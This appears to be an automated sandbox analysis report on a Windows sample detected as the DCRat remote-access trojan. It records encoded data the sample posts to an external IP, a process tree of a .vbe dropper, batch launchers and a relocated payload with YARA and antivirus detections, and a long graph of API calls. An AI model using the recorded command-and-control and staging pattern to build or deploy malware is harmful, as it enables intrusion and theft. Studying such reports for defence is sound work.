                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:32.505321980 CET555INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:32.505526066 CET558OUTData Raw: 57 59 5d 5e 5b 5b 5f 59 5d 57 55 57 55 5f 57 51 50 5e 58 48 56 55 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WY]^[[_Y]WUWU_WQP^XHVUW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*;)_?+R)3,-79>+ *W$%$#&R-<8>&G''^)#
                                                            Nov 21, 2023 04:48:32.706655025 CET558INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:32 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:04:46:51
                                                            Start date:21/11/2023
                                                            Path:C:\Users\user\Desktop\o9jDrpZrgR.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\o9jDrpZrgR.exe
                                                            Imagebase:0x880000
                                                            File size:1'622'827 bytes
                                                            MD5 hash:C256204DEB01C77E21BA17B5E2411245
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.2000894449.0000000004DA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.2000527838.0000000006E2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.1999993579.0000000006524000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:04:46:51
                                                            Start date:21/11/2023
                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\reviewruntimeMonitor\oYwPDBVe3AuHG3t6JLon5FNZVJrzPzwK1qz3t5qd93gftXcSil5zO.vbe"
                                                            Imagebase:0xfc0000
                                                            File size:147'456 bytes
                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:04:47:09
                                                            Start date:21/11/2023
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\reviewruntimeMonitor\XfrEwTdqjpljDpai91jT4EKzapK.bat" "
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:04:47:09
                                                            Start date:21/11/2023
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:04:47:09
                                                            Start date:21/11/2023
                                                            Path:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\reviewruntimeMonitor/BlockrefBrokerperf.exe
                                                            Imagebase:0xfc0000
                                                            File size:1'300'992 bytes
                                                            MD5 hash:295BF8D9B734730EFA567C8DA9918FE1
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000000.2180051762.0000000000FC2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:04:47:11
                                                            Start date:21/11/2023
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat"
                                                            Imagebase:0x7ff695380000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:04:47:12
                                                            Start date:21/11/2023
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:04:47:12
                                                            Start date:21/11/2023
                                                            Path:C:\Windows\System32\chcp.com
                                                            Wow64 process (32bit):false
                                                            Commandline:chcp 65001
                                                            Imagebase:0x7ff6c1e40000
                                                            File size:14'848 bytes
                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:04:47:12
                                                            Start date:21/11/2023
                                                            Path:C:\Windows\System32\PING.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:ping -n 10 localhost
                                                            Imagebase:0x7ff73a210000
                                                            File size:22'528 bytes
                                                            MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:04:47:21
                                                            Start date:21/11/2023
                                                            Path:C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe"
                                                            Imagebase:0x720000
                                                            File size:1'300'992 bytes
                                                            MD5 hash:295BF8D9B734730EFA567C8DA9918FE1
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 79%, ReversingLabs
                                                            • Detection: 69%, Virustotal, Browse
                                                            Reputation:low
                                                            Has exited:false

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:9.7%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:9.1%
                                                              Total number of Nodes:1525
                                                              Total number of Limit Nodes:41
                                                              execution_graph 25463 89c793 97 API calls 4 library calls 25512 89b18d 78 API calls 25513 899580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25465 89c793 102 API calls 4 library calls 25517 886faa 111 API calls 3 library calls 25467 89dca1 DialogBoxParamW 25518 89f3a0 27 API calls 25470 8aa4a0 71 API calls _free 25471 8b08a0 IsProcessorFeaturePresent 25519 89eda7 48 API calls _unexpected 25520 8ab1b8 27 API calls 2 library calls 25521 891bbd GetCPInfo IsDBCSLeadByte 23523 89e5b1 23524 89e578 23523->23524 23526 89e85d 23524->23526 23552 89e5bb 23526->23552 23528 89e86d 23529 89e8ca 23528->23529 23530 89e8ee 23528->23530 23531 89e7fb DloadReleaseSectionWriteAccess 6 API calls 23529->23531 23534 89e966 LoadLibraryExA 23530->23534 23536 89e9c7 23530->23536 23539 89e9d9 23530->23539 23548 89ea95 23530->23548 23532 89e8d5 RaiseException 23531->23532 23533 89eac3 23532->23533 23533->23524 23535 89e979 GetLastError 23534->23535 23534->23536 23537 89e98c 23535->23537 23538 89e9a2 23535->23538 23536->23539 23541 89e9d2 FreeLibrary 23536->23541 23537->23536 23537->23538 23542 89e7fb DloadReleaseSectionWriteAccess 6 API calls 23538->23542 23540 89ea37 GetProcAddress 23539->23540 23539->23548 23543 89ea47 GetLastError 23540->23543 23540->23548 23541->23539 23544 89e9ad RaiseException 23542->23544 23545 89ea5a 23543->23545 23544->23533 23547 89e7fb DloadReleaseSectionWriteAccess 6 API calls 23545->23547 23545->23548 23549 89ea7b RaiseException 23547->23549 23561 89e7fb 23548->23561 23550 89e5bb ___delayLoadHelper2@8 6 API calls 23549->23550 23551 89ea92 23550->23551 23551->23548 23553 89e5ed 23552->23553 23554 89e5c7 23552->23554 23553->23528 23569 89e664 23554->23569 23556 89e5cc 23557 89e5e8 23556->23557 23572 89e78d 23556->23572 23577 89e5ee GetModuleHandleW GetProcAddress GetProcAddress 23557->23577 23560 89e836 23560->23528 23562 89e80d 23561->23562 23563 89e82f 23561->23563 23564 89e664 DloadReleaseSectionWriteAccess 3 API calls 23562->23564 23563->23533 23565 89e812 23564->23565 23566 89e82a 23565->23566 23567 89e78d DloadProtectSection 3 API calls 23565->23567 23580 89e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23566->23580 23567->23566 23578 89e5ee GetModuleHandleW GetProcAddress GetProcAddress 23569->23578 23571 89e669 23571->23556 23575 89e7a2 DloadProtectSection 23572->23575 23573 89e7a8 23573->23557 23574 89e7dd VirtualProtect 23574->23573 23575->23573 23575->23574 23579 89e6a3 VirtualQuery GetSystemInfo 23575->23579 23577->23560 23578->23571 23579->23574 23580->23563 25522 89b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 23584 89f3b2 23585 89f3be __FrameHandler3::FrameUnwindToState 23584->23585 23616 89eed7 23585->23616 23587 89f3c5 23588 89f518 23587->23588 23591 89f3ef 23587->23591 23689 89f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 23588->23689 23590 89f51f 23682 8a7f58 23590->23682 23600 89f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23591->23600 23627 8a8aed 23591->23627 23598 89f40e 23606 89f48f 23600->23606 23685 8a7af4 38 API calls _abort 23600->23685 23602 89f495 23636 8a8a3e 51 API calls 23602->23636 23605 89f49d 23637 89df1e 23605->23637 23635 89f953 GetStartupInfoW _abort 23606->23635 23610 89f4b1 23610->23590 23611 89f4b5 23610->23611 23612 89f4be 23611->23612 23687 8a7efb 28 API calls _abort 23611->23687 23688 89f048 12 API calls ___scrt_uninitialize_crt 23612->23688 23615 89f4c6 23615->23598 23617 89eee0 23616->23617 23691 89f654 IsProcessorFeaturePresent 23617->23691 23619 89eeec 23692 8a2a5e 23619->23692 23621 89eef1 23626 89eef5 23621->23626 23700 8a8977 23621->23700 23624 89ef0c 23624->23587 23626->23587 23630 8a8b04 23627->23630 23628 89fbbc CatchGuardHandler 5 API calls 23629 89f408 23628->23629 23629->23598 23631 8a8a91 23629->23631 23630->23628 23632 8a8ac0 23631->23632 23633 89fbbc CatchGuardHandler 5 API calls 23632->23633 23634 8a8ae9 23633->23634 23634->23600 23635->23602 23636->23605 23838 890863 23637->23838 23641 89df3d 23887 89ac16 23641->23887 23643 89df46 _abort 23644 89df59 GetCommandLineW 23643->23644 23645 89df68 23644->23645 23646 89dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23644->23646 23891 89c5c4 23645->23891 23902 884092 23646->23902 23652 89dfe0 23896 89dbde 23652->23896 23653 89df76 OpenFileMappingW 23656 89df8f MapViewOfFile 23653->23656 23657 89dfd6 CloseHandle 23653->23657 23659 89dfcd UnmapViewOfFile 23656->23659 23660 89dfa0 __InternalCxxFrameHandler 23656->23660 23657->23646 23659->23657 23664 89dbde 2 API calls 23660->23664 23666 89dfbc 23664->23666 23665 8990b7 8 API calls 23667 89e0aa DialogBoxParamW 23665->23667 23666->23659 23668 89e0e4 23667->23668 23669 89e0fd 23668->23669 23670 89e0f6 Sleep 23668->23670 23673 89e10b 23669->23673 23935 89ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 23669->23935 23670->23669 23672 89e12a DeleteObject 23674 89e13f DeleteObject 23672->23674 23675 89e146 23672->23675 23673->23672 23674->23675 23676 89e189 23675->23676 23677 89e177 23675->23677 23932 89ac7c 23676->23932 23936 89dc3b 6 API calls 23677->23936 23679 89e17d CloseHandle 23679->23676 23681 89e1c3 23686 89f993 GetModuleHandleW 23681->23686 24219 8a7cd5 23682->24219 23685->23606 23686->23610 23687->23612 23688->23615 23689->23590 23691->23619 23704 8a3b07 23692->23704 23695 8a2a67 23695->23621 23697 8a2a6f 23698 8a2a7a 23697->23698 23718 8a3b43 DeleteCriticalSection 23697->23718 23698->23621 23747 8ac05a 23700->23747 23703 8a2a7d 7 API calls 2 library calls 23703->23626 23705 8a3b10 23704->23705 23707 8a3b39 23705->23707 23708 8a2a63 23705->23708 23719 8a3d46 23705->23719 23724 8a3b43 DeleteCriticalSection 23707->23724 23708->23695 23710 8a2b8c 23708->23710 23740 8a3c57 23710->23740 23713 8a2ba1 23713->23697 23715 8a2baf 23716 8a2bbc 23715->23716 23746 8a2bbf 6 API calls ___vcrt_FlsFree 23715->23746 23716->23697 23718->23695 23725 8a3c0d 23719->23725 23722 8a3d7e InitializeCriticalSectionAndSpinCount 23723 8a3d69 23722->23723 23723->23705 23724->23708 23726 8a3c4f 23725->23726 23727 8a3c26 23725->23727 23726->23722 23726->23723 23727->23726 23732 8a3b72 23727->23732 23730 8a3c3b GetProcAddress 23730->23726 23731 8a3c49 23730->23731 23731->23726 23738 8a3b7e ___vcrt_FlsGetValue 23732->23738 23733 8a3b95 LoadLibraryExW 23735 8a3bfa 23733->23735 23736 8a3bb3 GetLastError 23733->23736 23734 8a3bf3 23734->23726 23734->23730 23735->23734 23737 8a3c02 FreeLibrary 23735->23737 23736->23738 23737->23734 23738->23733 23738->23734 23739 8a3bd5 LoadLibraryExW 23738->23739 23739->23735 23739->23738 23741 8a3c0d ___vcrt_FlsGetValue 5 API calls 23740->23741 23742 8a3c71 23741->23742 23743 8a3c8a TlsAlloc 23742->23743 23744 8a2b96 23742->23744 23744->23713 23745 8a3d08 6 API calls ___vcrt_FlsGetValue 23744->23745 23745->23715 23746->23713 23750 8ac077 23747->23750 23751 8ac073 23747->23751 23749 89eefe 23749->23624 23749->23703 23750->23751 23753 8aa6a0 23750->23753 23765 89fbbc 23751->23765 23754 8aa6ac __FrameHandler3::FrameUnwindToState 23753->23754 23772 8aac31 EnterCriticalSection 23754->23772 23756 8aa6b3 23773 8ac528 23756->23773 23758 8aa6c2 23759 8aa6d1 23758->23759 23786 8aa529 29 API calls 23758->23786 23788 8aa6ed LeaveCriticalSection _abort 23759->23788 23762 8aa6e2 _abort 23762->23750 23763 8aa6cc 23787 8aa5df GetStdHandle GetFileType 23763->23787 23766 89fbc5 IsProcessorFeaturePresent 23765->23766 23767 89fbc4 23765->23767 23769 89fc07 23766->23769 23767->23749 23837 89fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23769->23837 23771 89fcea 23771->23749 23772->23756 23774 8ac534 __FrameHandler3::FrameUnwindToState 23773->23774 23775 8ac558 23774->23775 23776 8ac541 23774->23776 23789 8aac31 EnterCriticalSection 23775->23789 23797 8a91a8 20 API calls _abort 23776->23797 23779 8ac546 23798 8a9087 26 API calls _abort 23779->23798 23781 8ac550 _abort 23781->23758 23782 8ac590 23799 8ac5b7 LeaveCriticalSection _abort 23782->23799 23783 8ac564 23783->23782 23790 8ac479 23783->23790 23786->23763 23787->23759 23788->23762 23789->23783 23800 8ab136 23790->23800 23792 8ac498 23814 8a8dcc 23792->23814 23793 8ac48b 23793->23792 23807 8aaf0a 23793->23807 23796 8ac4ea 23796->23783 23797->23779 23798->23781 23799->23781 23806 8ab143 _abort 23800->23806 23801 8ab183 23821 8a91a8 20 API calls _abort 23801->23821 23802 8ab16e RtlAllocateHeap 23804 8ab181 23802->23804 23802->23806 23804->23793 23806->23801 23806->23802 23820 8a7a5e 7 API calls 2 library calls 23806->23820 23822 8aac98 23807->23822 23810 8aaf3a 23812 89fbbc CatchGuardHandler 5 API calls 23810->23812 23811 8aaf4f InitializeCriticalSectionAndSpinCount 23811->23810 23813 8aaf66 23812->23813 23813->23793 23815 8a8dd7 RtlFreeHeap 23814->23815 23819 8a8e00 _free 23814->23819 23816 8a8dec 23815->23816 23815->23819 23836 8a91a8 20 API calls _abort 23816->23836 23818 8a8df2 GetLastError 23818->23819 23819->23796 23820->23806 23821->23804 23823 8aacc8 23822->23823 23826 8aacc4 23822->23826 23823->23810 23823->23811 23824 8aace8 23824->23823 23827 8aacf4 GetProcAddress 23824->23827 23826->23823 23826->23824 23829 8aad34 23826->23829 23828 8aad04 _abort 23827->23828 23828->23823 23830 8aad55 LoadLibraryExW 23829->23830 23834 8aad4a 23829->23834 23831 8aad8a 23830->23831 23832 8aad72 GetLastError 23830->23832 23831->23834 23835 8aada1 FreeLibrary 23831->23835 23832->23831 23833 8aad7d LoadLibraryExW 23832->23833 23833->23831 23834->23826 23835->23834 23836->23818 23837->23771 23937 89ec50 23838->23937 23841 890888 GetProcAddress 23844 8908b9 GetProcAddress 23841->23844 23845 8908a1 23841->23845 23842 8908e7 23843 890c14 GetModuleFileNameW 23842->23843 23948 8a75fb 42 API calls 2 library calls 23842->23948 23854 890c32 23843->23854 23847 8908cb 23844->23847 23845->23844 23847->23842 23848 890b54 23848->23843 23849 890b5f GetModuleFileNameW CreateFileW 23848->23849 23850 890c08 CloseHandle 23849->23850 23851 890b8f SetFilePointer 23849->23851 23850->23843 23851->23850 23852 890b9d ReadFile 23851->23852 23852->23850 23856 890bbb 23852->23856 23857 890c94 GetFileAttributesW 23854->23857 23859 890c5d CompareStringW 23854->23859 23860 890cac 23854->23860 23939 88b146 23854->23939 23942 89081b 23854->23942 23856->23850 23858 89081b 2 API calls 23856->23858 23857->23854 23857->23860 23858->23856 23859->23854 23861 890cb7 23860->23861 23864 890cec 23860->23864 23863 890cd0 GetFileAttributesW 23861->23863 23865 890ce8 23861->23865 23862 890dfb 23886 89a64d GetCurrentDirectoryW 23862->23886 23863->23861 23863->23865 23864->23862 23866 88b146 GetVersionExW 23864->23866 23865->23864 23867 890d06 23866->23867 23868 890d0d 23867->23868 23869 890d73 23867->23869 23870 89081b 2 API calls 23868->23870 23871 884092 _swprintf 51 API calls 23869->23871 23872 890d17 23870->23872 23873 890d9b AllocConsole 23871->23873 23876 89081b 2 API calls 23872->23876 23874 890da8 GetCurrentProcessId AttachConsole 23873->23874 23875 890df3 ExitProcess 23873->23875 23953 8a3e13 23874->23953 23878 890d21 23876->23878 23949 88e617 23878->23949 23879 890dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23879->23875 23882 884092 _swprintf 51 API calls 23883 890d4f 23882->23883 23884 88e617 53 API calls 23883->23884 23885 890d5e 23884->23885 23885->23875 23886->23641 23888 89081b 2 API calls 23887->23888 23889 89ac2a OleInitialize 23888->23889 23890 89ac4d GdiplusStartup SHGetMalloc 23889->23890 23890->23643 23892 89c5ce 23891->23892 23893 89c6e4 23892->23893 23894 891fac CharUpperW 23892->23894 23978 88f3fa 82 API calls 2 library calls 23892->23978 23893->23652 23893->23653 23894->23892 23897 89ec50 23896->23897 23898 89dbeb SetEnvironmentVariableW 23897->23898 23900 89dc0e 23898->23900 23899 89dc36 23899->23646 23900->23899 23901 89dc2a SetEnvironmentVariableW 23900->23901 23901->23899 23979 884065 23902->23979 23905 89b6dd LoadBitmapW 23906 89b70b GetObjectW 23905->23906 23907 89b6fe 23905->23907 23911 89b71a 23906->23911 24047 89a6c2 FindResourceW 23907->24047 24042 89a5c6 23911->24042 23913 89b770 23924 88da42 23913->23924 23914 89b74c 24061 89a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23914->24061 23915 89a6c2 12 API calls 23918 89b73d 23915->23918 23917 89b754 24062 89a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23917->24062 23918->23914 23920 89b743 DeleteObject 23918->23920 23920->23914 23921 89b75d 24063 89a80c 8 API calls 23921->24063 23923 89b764 DeleteObject 23923->23913 24074 88da67 23924->24074 23929 8990b7 24207 89eb38 23929->24207 23933 89acab GdiplusShutdown OleUninitialize 23932->23933 23933->23681 23935->23673 23936->23679 23938 89086d GetModuleHandleW 23937->23938 23938->23841 23938->23842 23940 88b15a GetVersionExW 23939->23940 23941 88b196 23939->23941 23940->23941 23941->23854 23943 89ec50 23942->23943 23944 890828 GetSystemDirectoryW 23943->23944 23945 89085e 23944->23945 23946 890840 23944->23946 23945->23854 23947 890851 LoadLibraryW 23946->23947 23947->23945 23948->23848 23950 88e627 23949->23950 23955 88e648 23950->23955 23954 8a3e1b 23953->23954 23954->23879 23954->23954 23961 88d9b0 23955->23961 23958 88e66b LoadStringW 23959 88e645 23958->23959 23960 88e682 LoadStringW 23958->23960 23959->23882 23960->23959 23966 88d8ec 23961->23966 23963 88d9e2 23963->23958 23963->23959 23964 88d9cd 23964->23963 23974 88d9f0 26 API calls 23964->23974 23967 88d904 23966->23967 23972 88d984 _strncpy 23966->23972 23969 88d928 23967->23969 23975 891da7 WideCharToMultiByte 23967->23975 23973 88d959 23969->23973 23976 88e5b1 50 API calls __vsnprintf 23969->23976 23972->23964 23977 8a6159 26 API calls 3 library calls 23973->23977 23974->23963 23975->23969 23976->23973 23977->23972 23978->23892 23980 88407c __vsnwprintf_l 23979->23980 23983 8a5fd4 23980->23983 23986 8a4097 23983->23986 23987 8a40bf 23986->23987 23988 8a40d7 23986->23988 24003 8a91a8 20 API calls _abort 23987->24003 23988->23987 23990 8a40df 23988->23990 24005 8a4636 23990->24005 23991 8a40c4 24004 8a9087 26 API calls _abort 23991->24004 23995 8a40cf 23997 89fbbc CatchGuardHandler 5 API calls 23995->23997 23999 884086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23997->23999 23998 8a4167 24014 8a49e6 51 API calls 3 library calls 23998->24014 23999->23905 24002 8a4172 24015 8a46b9 20 API calls _free 24002->24015 24003->23991 24004->23995 24006 8a40ef 24005->24006 24007 8a4653 24005->24007 24013 8a4601 20 API calls 2 library calls 24006->24013 24007->24006 24016 8a97e5 GetLastError 24007->24016 24009 8a4674 24036 8a993a 38 API calls __cftof 24009->24036 24011 8a468d 24037 8a9967 38 API calls __cftof 24011->24037 24013->23998 24014->24002 24015->23995 24017 8a97fb 24016->24017 24020 8a9801 24016->24020 24038 8aae5b 11 API calls 2 library calls 24017->24038 24019 8ab136 _abort 20 API calls 24021 8a9813 24019->24021 24020->24019 24022 8a9850 SetLastError 24020->24022 24023 8a981b 24021->24023 24039 8aaeb1 11 API calls 2 library calls 24021->24039 24022->24009 24025 8a8dcc _free 20 API calls 24023->24025 24027 8a9821 24025->24027 24026 8a9830 24026->24023 24028 8a9837 24026->24028 24029 8a985c SetLastError 24027->24029 24040 8a9649 20 API calls _abort 24028->24040 24041 8a8d24 38 API calls _abort 24029->24041 24031 8a9842 24033 8a8dcc _free 20 API calls 24031->24033 24035 8a9849 24033->24035 24035->24022 24035->24029 24036->24011 24037->24006 24038->24020 24039->24026 24040->24031 24064 89a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24042->24064 24044 89a5cd 24045 89a5d9 24044->24045 24065 89a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24044->24065 24045->23913 24045->23914 24045->23915 24048 89a7d3 24047->24048 24049 89a6e5 SizeofResource 24047->24049 24048->23906 24048->23911 24049->24048 24050 89a6fc LoadResource 24049->24050 24050->24048 24051 89a711 LockResource 24050->24051 24051->24048 24052 89a722 GlobalAlloc 24051->24052 24052->24048 24053 89a73d GlobalLock 24052->24053 24054 89a7cc GlobalFree 24053->24054 24055 89a74c __InternalCxxFrameHandler 24053->24055 24054->24048 24056 89a7c5 GlobalUnlock 24055->24056 24066 89a626 GdipAlloc 24055->24066 24056->24054 24059 89a79a GdipCreateHBITMAPFromBitmap 24060 89a7b0 24059->24060 24060->24056 24061->23917 24062->23921 24063->23923 24064->24044 24065->24045 24067 89a638 24066->24067 24068 89a645 24066->24068 24070 89a3b9 24067->24070 24068->24056 24068->24059 24068->24060 24071 89a3da GdipCreateBitmapFromStreamICM 24070->24071 24072 89a3e1 GdipCreateBitmapFromStream 24070->24072 24073 89a3e6 24071->24073 24072->24073 24073->24068 24075 88da75 __EH_prolog 24074->24075 24076 88daa4 GetModuleFileNameW 24075->24076 24077 88dad5 24075->24077 24078 88dabe 24076->24078 24120 8898e0 24077->24120 24078->24077 24080 88db31 24131 8a6310 24080->24131 24082 88e261 78 API calls 24085 88db05 24082->24085 24085->24080 24085->24082 24098 88dd4a 24085->24098 24086 88db44 24087 8a6310 26 API calls 24086->24087 24095 88db56 ___vcrt_FlsGetValue 24087->24095 24088 88dc85 24088->24098 24167 889d70 81 API calls 24088->24167 24092 88dc9f ___std_exception_copy 24093 889bd0 82 API calls 24092->24093 24092->24098 24096 88dcc8 ___std_exception_copy 24093->24096 24095->24088 24095->24098 24145 889e80 24095->24145 24161 889bd0 24095->24161 24166 889d70 81 API calls 24095->24166 24096->24098 24115 88dcd3 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 24096->24115 24168 891b84 MultiByteToWideChar 24096->24168 24154 88959a 24098->24154 24099 88e159 24104 88e1de 24099->24104 24174 8a8cce 26 API calls 2 library calls 24099->24174 24101 88e16e 24175 8a7625 26 API calls 2 library calls 24101->24175 24103 88e1c6 24176 88e27c 78 API calls 24103->24176 24105 88e214 24104->24105 24108 88e261 78 API calls 24104->24108 24109 8a6310 26 API calls 24105->24109 24108->24104 24110 88e22d 24109->24110 24111 8a6310 26 API calls 24110->24111 24111->24098 24113 891da7 WideCharToMultiByte 24113->24115 24115->24098 24115->24099 24115->24113 24169 88e5b1 50 API calls __vsnprintf 24115->24169 24170 8a6159 26 API calls 3 library calls 24115->24170 24171 8a8cce 26 API calls 2 library calls 24115->24171 24172 8a7625 26 API calls 2 library calls 24115->24172 24173 88e27c 78 API calls 24115->24173 24118 88e29e GetModuleHandleW FindResourceW 24119 88da55 24118->24119 24119->23929 24121 8898ea 24120->24121 24122 88994b CreateFileW 24121->24122 24123 88996c GetLastError 24122->24123 24127 8899bb 24122->24127 24177 88bb03 24123->24177 24125 88998c 24126 889990 CreateFileW GetLastError 24125->24126 24125->24127 24126->24127 24130 8899b5 24126->24130 24128 8899ff 24127->24128 24129 8899e5 SetFileTime 24127->24129 24128->24085 24129->24128 24130->24127 24132 8a6349 24131->24132 24133 8a634d 24132->24133 24144 8a6375 24132->24144 24181 8a91a8 20 API calls _abort 24133->24181 24135 8a6352 24182 8a9087 26 API calls _abort 24135->24182 24136 89fbbc CatchGuardHandler 5 API calls 24138 8a66a6 24136->24138 24138->24086 24139 8a635d 24140 89fbbc CatchGuardHandler 5 API calls 24139->24140 24141 8a6369 24140->24141 24141->24086 24143 8a6699 24143->24136 24144->24143 24183 8a6230 5 API calls CatchGuardHandler 24144->24183 24146 889e92 24145->24146 24147 889ea5 24145->24147 24148 889eb0 24146->24148 24184 886d5b 77 API calls 24146->24184 24147->24148 24149 889eb8 SetFilePointer 24147->24149 24148->24095 24149->24148 24151 889ed4 GetLastError 24149->24151 24151->24148 24152 889ede 24151->24152 24152->24148 24185 886d5b 77 API calls 24152->24185 24155 8895be 24154->24155 24156 8895cf 24154->24156 24155->24156 24157 8895ca 24155->24157 24158 8895d1 24155->24158 24156->24118 24186 88974e 24157->24186 24191 889620 24158->24191 24162 889bdc 24161->24162 24164 889be3 24161->24164 24162->24095 24164->24162 24165 889785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24164->24165 24206 886d1a 77 API calls 24164->24206 24165->24164 24166->24095 24167->24092 24168->24115 24169->24115 24170->24115 24171->24115 24172->24115 24173->24115 